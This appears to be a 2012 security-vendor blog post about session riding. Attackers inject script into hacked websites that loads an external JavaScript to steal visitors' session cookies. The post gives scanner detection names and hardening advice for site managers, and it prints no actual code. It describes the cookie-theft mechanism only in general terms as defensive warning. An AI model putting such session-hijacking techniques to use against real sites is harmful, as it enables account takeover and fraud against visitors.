19/04/2012

Session riding endangers unsuspecting web surfers

Session riding endangers unsuspecting web surfers Malware

The attackers injected script code into regular websites which leads the unsuspecting visitors to a deposited malicious JavaScript file on an external server. This file is designed to steal session cookies in order to make it possible for the attacker to pretend to be the real user and to use this session for fraudulent actions.


The injected code
It is either written in cleartext or encoded and therefore obfuscated.
Screenshot of the injected code in cleartext
Our scanners detect this injection as HTML:Script-inf and therefore, G Data users with an active HTTP-filtering, will be alerted right away when visiting one of those infected sites.

The deposited JavaScript
The JavaScript has been found on several servers and with several different names. If executed, the most recent one tries to get information about the visiting user’s browser and then steals all session cookies from the respective location on the computer.
The G Data scan engines detect this recent JavaScript as Trojan.JS.Iframe.BDV and JS:Iframe-FP [Trj].

What can happen?
One example: Let’s imagine the attackers injected the script code mentioned above into a website with online shopping capabilities. An unsuspecting user visits the website, logs in to the shop while the linked malicious JavaScript is executed. Attackers can now steal the session cookie with the active shopping account and can act as if they are the actual visiting user. Therefore, they could order goods, etc. without the user realizing it.
It’s a fact that the attackers can upload anything to the hacked webserver as long as they have the possibility to log-in. There are manifold possibilities the attackers can misuse the server for. For example, they can both use it to inject redirecting scripts or upload malware and therefore use it as a malware host, etc.

How were the attackers able to inject the code in the first place?
There are many ways how attackers can gain access to website management systems. Recently, there have been a lot of reports about exploited vulnerabilities in content management systems which lead to code injections and dangerous situations. Remember the ticking time bomb on hacked WordPress pages?
Many of the infected pages we have seen use popular free CMS solutions like WordPress or Joomla, but many don’t. Therefore, we suspect that the source of all evil is another one…

From what we know by now, it seems most likely that computers of users managing the websites have been infected with password stealing malware and this malware has provided the attackers with the necessary data (especially ftp passwords) to enter the websites.


The importance of securing ones computer has already been illustrated numerous times – especially because of the fact that one single infected computer can, in succession, harm thousands of others: Attackers gained access to website management systems and injected code into websites which harm the visiting users.


What can website managers do?

  • To secure your site, your website management system should be up to date at all time. Install the latest software from the developer’s website.
  • The same applies to all used plug-ins and themes for your websites.
  • In case you own the web server, ensure that it is up to date and in a secured state. If you rented web space on a remote server, get in contact with your provider to inform yourself about the issue.
  • Make sure that all passwords for all accounts (CMS, FTP, etc.) are chosen wisely. An administration account should not be named “admin” and every account needs to have a unique password that is sufficiently secure. Read more about information on secure passwords.
  • Disable/Delete inactive accounts for your website management systems.
  • Scan and monitor all computers that have access to your website management systems with comprehensive security solutions to avoid getting infected with (password stealing) malware.